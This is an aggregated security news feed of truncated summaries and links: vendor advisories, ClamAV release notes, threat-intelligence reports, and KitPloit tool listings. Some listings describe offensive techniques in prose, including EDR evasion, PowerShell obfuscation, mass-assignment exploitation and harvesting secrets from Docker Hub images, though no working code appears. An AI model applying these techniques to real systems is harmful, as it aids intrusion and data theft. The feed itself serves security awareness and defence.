file-unpumper is a powerful command-line utility designed to clean and analyze Portable Executable (PE) files. It provides a range of features to help developers and security professionals work with PE files more effectively. Features PE Header Fixing: file-unpumper can fix and align the PE headers of a given executable file. This is particularly useful for resolving issues caused by packers or obfuscators that modify the headers. Resource Extraction: The tool can extract embedded resources from a PE file, such as icons, bitmaps, or other data resources. This can be helpful for reverse engineering or analyzing the contents of an executable. Metadata Analysis: file-unpumper provides a comprehensive analysis of the PE file's metadata, including information about the machine...
http://www.kitploit.com/2024/09/file-unpumper-tool-that-can-be-used-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests
Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities. Disclaimer This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk. Features Enables the addition of custom headers within requests Offers customization of various HTTP methods for both origin and...
http://www.kitploit.com/2024/09/mass-assigner-simple-tool-made-to-probe.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Single IP is Scanning Intensely, and Yields a List of Malware Loaders
Overall scanning for CVEs we track is down, but one specific scanner caught our attention. We dig into what it’s doing.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Imperius - Make An Linux Kernel Rootkit Visible Again
A make an LKM rootkit visible again. This tool is part of research on LKM rootkits that will be launched. It involves getting the memory address of a rootkit's "show_module" function, for example, and using that to call it, adding it back to lsmod, making it possible to remove an LKM rootkit. We can obtain the function address in very simple kernels using /sys/kernel/tracing/available_filter_functions_addrs, however, it is only available from kernel 6.5x onwards. An alternative to this is to scan the kernel memory, and later add it to lsmod again, so it can be removed. So in summary, this LKM abuses the function of lkm rootkits that have the functionality to become visible again. OBS: There is another trick of removing/defusing a LKM rootkit, but it will be in the research that will...
http://www.kitploit.com/2024/09/imperius-make-linux-kernel-rootkit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BYOSI - Evade EDR's The Simple Way, By Not Touching Any Of The API's They Hook
Evade EDR's the simple way, by not touching any of the API's they hook. Theory I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit. Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible. Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering...
http://www.kitploit.com/2024/09/byosi-evade-edrs-simple-way-by-not.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Psobf - PowerShell Obfuscator
Tool for obfuscating PowerShell scripts written in Go. The main objective of this program is to obfuscate PowerShell code to make its analysis and detection more difficult. The script offers 5 levels of obfuscation, from basic obfuscation to script fragmentation. This allows users to tailor the obfuscation level to their specific needs../psobf -h ██████╗ ███████╗ ██████╗ ██████╗ ███████╗ ██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝ ██████╔╝███████╗██║ ██║██████╔╝█████╗ ██╔═══╝ ╚════██║██║ ██║██╔══██╗██╔══╝...
http://www.kitploit.com/2024/09/psobf-powershell-obfuscator.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CloudImposer
Google Cloud Composer is a managed service for Apache Airflow. Tenable discovered that the Cloud Composer package was vulnerable to dependency confusion, which could have allowed attackers to inject malicious code when the package was compiled from source. This could have led to remote code execution on machines running Cloud Composer, which include various other GCP services as well as internal servers at Google. The dependency confusion stemmed from Google's risky recommendation in their documentation to use the --extra-index-url argument when installing private Python packages. Following disclosure, Google fixed the dependency confusion vulnerability and also updated their documentation.
https://www.cloudvulndb.org/cloudimposer-gcp
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Document AI data exfiltration
The Document AI service unintentionally allows users to read any Cloud Storage object in the same project, in a way that isn't properly documented. The Document AI service agent is auto-assigned with excessive permissions, allowing it to access all objects from Cloud Storage buckets in the same project. Malicious actors can exploit this to exfiltrate data from Cloud Storage by indirectly leveraging the service agent's permissions. This vulnerability is an instance of transitive access abuse, a class of security flaw where unauthorized access is gained indirectly through a trusted intermediary.
https://www.cloudvulndb.org/gcp-document-ai-data-exfil
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ModTracer - ModTracer Finds Hidden Linux Kernel Rootkits And Then Make Visible Again
ModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.Another way to make an LKM visible is using the imperius trick: https://github.com/MatheuZSecurity/ImperiusDownload ModTracer
http://www.kitploit.com/2024/09/modtracer-modtracer-finds-hidden-linux.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. What is Docker? Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed. About Docker Hub Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access...
http://www.kitploit.com/2024/09/dockerspy-dockerspy-searches-for-images.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions published
Today, we are publishing the 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and (with exception to 0.103.12) through Docker Hub.The images on Docker Hub may not be immediately available on release day.Continue reading to learn what changed in each version.1.4.1ClamAV 1.4.1 is a critical patch release with the following fixes:CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files.This issue affects all currently supported versions. It will be fixed in:1.4.11.3.21.0.70.103.12Thank...
http://blog.clamav.net/2024/09/clamav-141-132-107-and-010312-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis & building proof-of-concept for CVE-2024-38063, a CVSS 9.8 Vulnerability In the Windows Kernel IPv6 Parser
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Copilot Studio information disclosure via SSRF

https://www.cloudvulndb.org/copilot-studio-infoleak-ssrf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.4.0 feature release and ClamAV bytecode compiler 1.4.0 release
The ClamAV 1.4.0 feature release is now stable. We encourage everyone to download the latest version now from the ClamAV downloads page, on the GitHub Release page, and through Docker Hub*:Alpine-based imagesDebian-based multi-arch images*The Docker images are built on release day and will be made available when they are ready.We are also publishing ClamAV bytecode compiler version 1.4.0.The ClamAV bytecode compiler release files are available for download on the GitHub Release page and through Docker Hub.ClamAV platform support changesWe will no longer provide Linux 32-bit packages. With RHEL 7 reaching end-of-life, we had to upgrade our build hosts and selected Alma Linux 8. Alma Linux does not provide 32-bit images. ClamAV users on 32-bit platforms can still build from source.We now provide...
http://blog.clamav.net/2024/08/clamav-140-feature-release-and-clamav.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations
As digital currencies have grown, so have cryptocurrency scams, posing significant user risks. The rise of AI and deepfake technology has intensified scams exploiting famous personalities and events by creating realistic fake videos. Platforms like X and YouTube have been especially targeted, with scammers hijacking high-profile accounts to distribute fraudulent content. This report delves into the CryptoCore group's complex scam operations, analyzing their use of deepfakes, hijacked accounts, and fraudulent websites to deceive victims and profit millions of dollars. The post CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations appeared first on Avast Threat Labs.
https://decoded.avast.io/martinchlumecky1/cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations/?utm_source=rss&utm_medium=rss&utm_campaign=cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RADIUS Protocol CVE-2024-3596
A fundamental design flaw within the RADIUS protocol has been proven to be exploitable, compromising the integrity in the RADIUS Access-Request process. The attack allows a malicious user to modify packets in a way that would be indistinguishable to a RADIUS client or server. To be successful, the attacker must have the ability to inject themselves between the client and server. Revised on 2025-03-14 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-255
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Azue Health privilege escalation via SSRF

https://www.cloudvulndb.org/azure-health-pe-ssrf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 0.103 LTS End of Life Announcement
The ClamAV 0.103 LTS release is nearing end-of-life (EOL) with regards to security vulnerability fix support from our team. This end of life date will be Sept. 14, 2024. ClamAV 0.103 users will be able to update signatures from the official database mirror for an additional one year after the EOL date. After Sept. 14, 2025, we may block ClamAV 0.103 from downloading signature updates. We recommend that users update to the newest LTS release, ClamAV 1.0.6. For users that want to upgrade to the newest non-LTS release, use ClamAV 1.3.1. The most recent version of ClamAV can be found here: https://www.clamav.net/downloads The following is a list of major changes available to users in the newest versions of ClamAV. Since ClamAV 0.103, ClamAV 1.0 LTS adds: ·                     A...
http://blog.clamav.net/2024/08/clamav-0103-lts-end-of-life-announcement.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

60 Hurts per Second – How We Got Access to Enough Solar Power to Run the United States
The electricity grid – the buzzing, crackling marvel that supplies the lifeblood of modernity - is by far the largest structure humanity ever built. It's so big, in fact, that few people even notice it, like a fish can't see the ocean. Until the grid goes down, that is. Then, like the fish dangling from the angler's hook, we see our vulnerability. Modernity dissolves into a sudden silence, followed by the repeated flick of a light switch, and a howl of panic at the prospect of missed appointmen
https://www.bitdefender.com/en-us/blog/labs/60-hurts-per-second-how-we-got-access-to-enough-solar-power-to-run-the-united-states
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with AWS Client VPN - CVE-2024-30164, CVE-2024-30165
Publication Date: 2024/07/16 3:30 PM PDT AWS is aware of CVE-2024-30164 and CVE-2024-30165 in AWS Client VPN. These issues could potentially allow an actor with access to an end user's device to escalate to root privilege and execute arbitrary commands on that device. We addressed these issues on all platforms. Customers using AWS Client VPN should upgrade to version 3.11.1 or higher for Windows, 3.9.2 or higher for MacOS, and 3.12.1 or higher for Linux. For additional information on configuring AWS Client VPN to meet your security and compliance requirements, please refer to our "Security in AWS Client VPN" user guide. We would like to thank Robinhood for collaborating on this issue through the coordinated vulnerability disclosure process. Security-related questions...
https://aws.amazon.com/security/security-bulletins/AWS-2024-008/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with PyTorch TorchServe - CVE-2024-35198, CVE-2024-35199
Publication Date: 2024/07/18 2:50 PM PDT AWS is aware of the issues described in CVE-2024-35198 and CVE-2024-35199 in PyTorch TorchServe versions 0.3.0 to 0.10.0. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker are not affected. CVE-2024-35198 does not prevent a model from being downloaded into the model store if the URL contains characters such as ".." when TorchServe model registration API is called. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and Amazon Elastic Kubernetes Service (Amazon EKS) are not affected by this issue. CVE-2024-35199 does not bind two gRPC ports 7070 and 7071 to localhost by default. These two interfaces are bound to all interfaces when TorchServe is natively launched...
https://aws.amazon.com/security/security-bulletins/AWS-2024-009/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How insecure is Avast Secure Browser?
A while ago I already looked into Avast Secure Browser. Back then it didn't end well for Avast: I found critical vulnerabilities allowing arbitrary websites to infect user's computer. Worse yet: much of it was due to neglect of secure coding practices, existing security mechanisms were disabled for no good reason. I didn't finish that investigation because I discovered that the browser was essentially spyware, collecting your browsing history and selling it via Avast's Jumpshot subsidiary. But that was almost five years ago. After an initial phase of denial, Avast decided to apologize and to wind down Jumpshot. It was certainly a mere coincidence that Avast was subsequently sold to NortonLifeLock, called Gen Digital today. Yes, Avast is truly reformed and paying for their crimes in...
https://palant.info/2024/07/15/how-insecure-is-avast-secure-browser/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unauthorized Access to AWS Account Findings in Microsoft Defender for Cloud
Microsoft Defender for Cloud at one point provided customers with a flawed configuration template through their public GitHub repository. This template creates resources in the customer's AWS account so that Microsoft Defender for Cloud can scan it. In the rare cases in which this template was deployed, under certain, limited circumstances, Defender for Cloud's security findings for these AWS accounts could be disclosed to unauthorized third parties.
https://www.cloudvulndb.org/mdc-aws-findings-disclosure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deep Dive on Supplement Scams: How AI Drives ‘Miracle Cures' and Sponsored Health-Related Scams on Social Media
Sponsored social media content has become increasingly present on feeds. Sponsored ads can often be beneficial as they are customized to suit online personas, offering relevant content tailored specifically for you. While personalized ads can help enhance your online experience, not all are legitimate. In fact, scams originating from phony ads on social media have increased dramatically, with potentially severe consequences for consumers. Sponsored supplement scams on social media platforms
https://www.bitdefender.com/en-us/blog/labs/deep-dive-on-supplement-scams-how-ai-drives-miracle-cures-and-sponsored-health-related-scams-on-social-media
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decrypted: DoNex Ransomware and its Predecessors
Researchers from Avast have discovered a flaw in the cryptographic schema of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The  cryptographic weakness was made public at Recon 2024 and therefore we have no reason to keep […] The post Decrypted: DoNex Ransomware and its Predecessors appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-donex-ransomware-and-its-predecessors
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Windows Registry Adventure #3: Learning resources
Posted by Mateusz Jurczyk, Google Project Zero When tackling a new vulnerability research target, especially a closed-source one, I prioritize gathering as much information about it as possible. This gets especially interesting when it's a subsystem as old and fundamental as the Windows registry. In that case, tidbits of valuable data can lurk in forgotten documentation, out-of-print books, and dusty open-source code – each potentially offering a critical piece of the puzzle. Uncovering them takes some effort, but the payoff is often immense. Scraps of information can contain hints as to how certain parts of the software are implemented, as well as why – what were ...
https://googleprojectzero.blogspot.com/2024/06/the-windows-registry-adventure-3.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife
Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine. Main Features - Wayback Crawler Machine- Google Dorking without limits- Github Information Grabbing- Subdomain Identifier - Cms/Technology Detector With Custom Headers Installation ~> git clone https://github.com/ankitdobhal/Ashok~> cd Ashok~> python3.7 -m pip3 install -r requirements.txt How to use Ashok? A detailed usage guide is available on Usage section of the Wiki. But Some index of options is given below:...
http://www.kitploit.com/2024/06/ashok-osint-recon-tool-aka-swiss-army.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models
Posted by Sergei Glazunov and Mark Brand, Google Project Zero IntroductionAt Project Zero, we constantly seek to expand the scope and effectiveness of our vulnerability research. Though much of our work still relies on traditional methods like manual source code audits and reverse engineering, we're always looking for new approaches. As the code comprehension and general reasoning ability of Large Language Models (LLMs) has improved, we have been exploring how these models can reproduce the systematic approach of a human security researcher when identifying and demonstrating security vulnerabilities. We hope that in the future, this can close some of the blind spots of current automated vulnerability discovery approaches, and enable automated detection of "unfuzzable" vulnerabilities. ...
https://googleprojectzero.blogspot.com/2024/06/project-naptime.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Diamorphine rootkit variant seen undetected in the wild
Introduction Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in-the-wild.  Diamorphine is a well-known […] The post New Diamorphine rootkit variant seen undetected in the wild appeared first on Avast Threat Labs.
https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/?utm_source=rss&utm_medium=rss&utm_campaign=new-diamorphine-rootkit-variant-seen-undetected-in-the-wild
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Azure Machine Learning SSRF

https://www.cloudvulndb.org/azure-ml-ssrf-pt
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Driving forward in Android drivers
Posted by Seth Jenkins, Google Project ZeroIntroduction Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited so this research sought to explore those drivers in greater detail.Driver Enumeration: Not as Easy as it Looks This...
https://googleprojectzero.blogspot.com/2024/06/driving-forward-in-android-drivers.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unfading Sea Haze: New Espionage Campaign in the South China Sea
Bitdefender researchers investigated a series of incidents at high-level organizations in countries of the South China Sea region, all performed by the same  threat actor we track as Unfading Sea Haze. Based on the victimology and the cyber-attack's aim, we believe the threat actor is aligned with China's interests. As tensions in the region rise, they are reflected in the intensification of activity on behalf of the Unfading Sea Haze actor, which uses new and improved tools and TTPs. We notice
https://www.bitdefender.com/en-us/blog/labs/unfading-sea-haze-new-espionage-campaign-in-the-south-china-sea
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most popular IoT devices, hunting for vulnerabilities and undocumented attack avenues. This report documents four vulnerabilities affecting devices powered by the ThroughTek Kalay Platform. Due to the platform's massive presence in IoT integrations, these flaws have a significant downstream impact on several vendors. In the interconnected landscape of the Internet of Things (IoT), the reliability and security of devices,
https://www.bitdefender.com/en-us/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Avast Q1/2024 Threat Report
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign The post Avast Q1/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q1-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q1-2024-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.4.0 release candidate now available!
The ClamAV 1.4.0 release candidate is now available.You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.4.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package.  But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags.The release candidate phase is expected...
http://blog.clamav.net/2024/05/clamav-140-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining
Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers. The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Key Points Introduction In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […] The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.
https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.1, 1.2.3, 1.0.6 patch versions published
Today, we are publishing the 1.3.1, 1.2.3, and 1.0.6 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub.The images on Docker Hub may not be immediately available on release day.Continue reading to learn what changed in each version.1.3.1ClamAV 1.3.1 is a critical patch release with the following fixes:CVE-2024-20380: Fixed a possible crash in the HTML file parser that could cause a denial-of-service (DoS) condition.This issue affects version 1.3.0 only and does not affect prior versions.Thank you to Błażej Pawłowski for identifying this issue.GitHub pull requestUpdated select Rust dependencies to the latest versions. This resolved Cargo audit complaints and included...
http://blog.clamav.net/2024/04/clamav-131-123-106-patch-versions.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerabilities Identified in LG WebOS
As the creator of the world's first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities. This research paper is part of a broader program that aims to shed light on the security of the world's best-sellers in the IoT space. This report covers vulnerabilities discovered while researching the LG WebOS TV operating system. We have found several issues affecting WebOS versions 4 through 7 running on LG TVs. These vulnerabilities let us gain root acces
https://www.bitdefender.com/en-us/blog/labs/vulnerabilities-identified-in-lg-webos
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI meets next-gen info stealers in social media malvertising campaigns
The impact that AI has on society has steadily crept into the darkest nooks and crannies of the internet. So much so that cybercrooks are hitching free rides on the AI bandwagon by leveraging the increased demand of AI-powered software for content creators. Cybercriminal groups constantly adapt their operating methods and tools to stay a step ahead of potential victims. Highly focused on enhancing their deceptive practices, threat actors have, unfortunately, found a most reliable and powerful a
https://www.bitdefender.com/en-us/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Numerous vulnerabilities in Xunlei Accelerator application
Xunlei Accelerator (迅雷客户端) a.k.a. Xunlei Thunder by the China-based Xunlei Ltd. is a wildly popular application. According to the company's annual report 51.1 million active users were counted in December 2022. The company's Google Chrome extension 迅雷下载支持, while not mandatory for using the application, had 28 million users at the time of writing. I've found this application to expose a massive attack surface. This attack surface is largely accessible to arbitrary websites that an application user happens to be visiting. Some of it can also be accessed from other computers in the same network or by attackers with the ability to intercept user's network connections (Man-in-the-Middle attack). It does not appear like security concerns were considered in the design...
https://palant.info/2024/03/06/numerous-vulnerabilities-in-xunlei-accelerator-application/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sponsored Ad Fraud: Mystery Box Scams Flood Social Media
Social media platforms are overflowing with scams. In the past couple of months, Bitdefender Labs has been monitoring a steep increase in fraudulent social media ads on Facebook promoting various swindles ranging from crypto-doubling to AI-generated celebrity-endorsed giveaways. Our latest analysis has spotted a consistent trend, with fraudsters continuing to exploit Meta's ad system to deceive consumers. The hustle? A long-established ruse that involves peddling so-called mystery boxes from
https://www.bitdefender.com/en-us/blog/labs/sponsored-ad-fraud-mystery-box-scams-flood-social-media
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day
The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro. The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.
https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

When Stealers Converge: New Variant of Atomic Stealer in the Wild
Here at Bitdefender, we're constantly working on improving detection capabilities for our macOS cyber-security products; part of this effort involves revisiting old (or digging up new) samples from our malware zoo. During routine verifications, we were able to isolate multiple suspicious and undetected macOS disk image files surprisingly small for files of this kind (1.3 MB per file). A short look into the code revealed that these files are significantly similar to other samples analysed in the
https://www.bitdefender.com/en-us/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Details on Apple's Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204
CVE-2024-23204 sheds light on the critical importance of continuous security vigilance. Apple's Shortcuts application, designed to enhance user automation, can inadvertently become a potential vector for privacy breaches. This analysis aims to provide users, developers, and security professionals with insights into the nature of the vulnerability, its potential impact, and recommended mitigation measures. At a glance: * We have discovered a vulnerability in Apple Shortcuts that lets a potent
https://www.bitdefender.com/en-us/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
The ClamAV 1.3.0 feature release is now stable!Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support.The release files are available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub*:Alpine-based imagesDebian-based multi-arch images*The Docker images are built on release day and may not be available until later in the day.Continue reading to learn what changed in each version.1.3.0ClamAV 1.3.0 includes the following improvements and changes:Major changesAdded support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate.You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags:clamav/clamav:unstableclamav/clamav:unstable_base clamav/clamav-debian:unstableclamav/clamav-debian:unstable_base This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`.In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`.ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.0 release candidate now available!
The ClamAV 1.3.0 release candidate is now available.You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package.  But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags.The release candidate phase is expected...
http://blog.clamav.net/2023/12/clamav-130-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.2.1, 1.1.3, 1.0.4, 0.103.11 patch versions published
